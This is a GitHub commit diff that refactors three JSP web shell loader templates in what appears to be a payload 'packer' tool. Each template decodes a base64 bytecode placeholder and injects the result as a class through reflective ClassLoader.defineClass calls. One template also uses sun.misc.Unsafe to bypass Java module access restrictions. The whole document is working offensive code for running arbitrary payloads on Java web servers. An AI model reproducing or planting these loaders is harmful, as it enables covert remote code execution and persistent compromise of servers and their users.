Skip to content

Commit 1f51ddc

Browse files
ReaJasonReaJason
committed
refactor: simplify payload
1 parent b71cd4a commit 1f51ddc

File tree

3 files changed

+14
-41
lines changed

3 files changed

+14
-41
lines changed

packer/src/main/resources/shell.jsp

Lines changed: 0 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -1,10 +1,3 @@
1-
<%@ page import="java.lang.*" %>
2-
<%@ page import="java.lang.Class" %>
3-
<%@ page import="java.lang.ClassLoader" %>
4-
<%@ page import="java.lang.ClassNotFoundException" %>
5-
<%@ page import="java.lang.Object" %>
6-
<%@ page import="java.lang.String" %>
7-
<%@ page import="java.lang.Thread" %>
81
<%!
92
public static class ClassDefiner extends ClassLoader {
103
public ClassDefiner(ClassLoader classLoader) {

packer/src/main/resources/shell1.jsp

Lines changed: 3 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -1,24 +1,16 @@
1-
<%@ page import="java.lang.*" %>
2-
<%@ page import="java.lang.Class" %>
3-
<%@ page import="java.lang.ClassLoader" %>
4-
<%@ page import="java.lang.ClassNotFoundException" %>
5-
<%@ page import="java.lang.Object" %>
6-
<%@ page import="java.lang.String" %>
7-
<%@ page import="java.lang.Thread" %>
81
<%
9-
ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
102
String base64Str = "{{base64Str}}";
113
byte[] bytecode = null;
124
try {
13-
Class base64Clz = classLoader.loadClass("java.util.Base64");
5+
Class base64Clz = Class.forName("java.util.Base64");
146
Object decoder = base64Clz.getMethod("getDecoder").invoke(null);
157
bytecode = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
168
} catch (ClassNotFoundException ee) {
17-
Class datatypeConverterClz = classLoader.loadClass("javax.xml.bind.DatatypeConverter");
9+
Class datatypeConverterClz = Class.forName("javax.xml.bind.DatatypeConverter");
1810
bytecode = (byte[]) datatypeConverterClz.getMethod("parseBase64Binary", String.class).invoke(null, base64Str);
1911
}
2012
java.lang.reflect.Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
2113
defineClass.setAccessible(true);
22-
Class clazz = (Class) defineClass.invoke(classLoader, bytecode, 0, bytecode.length);
14+
Class clazz = (Class) defineClass.invoke(Thread.currentThread().getContextClassLoader(), bytecode, 0, bytecode.length);
2315
clazz.newInstance();
2416
%>

packer/src/main/resources/shell2.jsp

Lines changed: 11 additions & 23 deletions
Original file line numberDiff line numberDiff line change
@@ -1,25 +1,4 @@
1-
<%@ page import="java.lang.*" %>
2-
<%@ page import="java.lang.Class" %>
3-
<%@ page import="java.lang.ClassLoader" %>
4-
<%@ page import="java.lang.ClassNotFoundException" %>
5-
<%@ page import="java.lang.Integer" %>
6-
<%@ page import="java.lang.Long" %>
7-
<%@ page import="java.lang.Object" %>
8-
<%@ page import="java.lang.String" %>
9-
<%@ page import="java.lang.Thread" %>
10-
<%@ page import="java.lang.Throwable" %>
111
<%
12-
String base64Str = "{{base64Str}}";
13-
byte[] bytecode = null;
14-
ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
15-
try {
16-
Class base64Clz = classLoader.loadClass("java.util.Base64");
17-
Object decoder = base64Clz.getMethod("getDecoder").invoke(null);
18-
bytecode = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
19-
} catch (ClassNotFoundException ee) {
20-
Class datatypeConverterClz = classLoader.loadClass("javax.xml.bind.DatatypeConverter");
21-
bytecode = (byte[]) datatypeConverterClz.getMethod("parseBase64Binary", String.class).invoke(null, base64Str);
22-
}
232
Object unsafe = null;
243
Object rawModule = null;
254
long offset = 48;
@@ -37,10 +16,19 @@
3716
getAndSetObjectM.invoke(unsafe, this.getClass(), offset, module);
3817
} catch (Throwable ignored) {
3918
}
40-
java.net.URLClassLoader urlClassLoader = new java.net.URLClassLoader(new java.net.URL[0], Thread.currentThread().getContextClassLoader());
19+
String base64Str = "{{base64Str}}";
20+
byte[] bytecode = null;
21+
try {
22+
Class base64Clz = Class.forName("java.util.Base64");
23+
Object decoder = base64Clz.getMethod("getDecoder").invoke(null);
24+
bytecode = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
25+
} catch (ClassNotFoundException ee) {
26+
Class datatypeConverterClz = Class.forName("javax.xml.bind.DatatypeConverter");
27+
bytecode = (byte[]) datatypeConverterClz.getMethod("parseBase64Binary", String.class).invoke(null, base64Str);
28+
}
4129
java.lang.reflect.Method defMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
4230
defMethod.setAccessible(true);
43-
Class<?> clazz = (Class<?>) defMethod.invoke(urlClassLoader, bytecode, 0, bytecode.length);
31+
Class<?> clazz = (Class<?>) defMethod.invoke(Thread.currentThread().getContextClassLoader(), bytecode, 0, bytecode.length);
4432
if (getAndSetObjectM != null) {
4533
getAndSetObjectM.invoke(unsafe, this.getClass(), offset, rawModule);
4634
}

0 commit comments

Comments
 (0)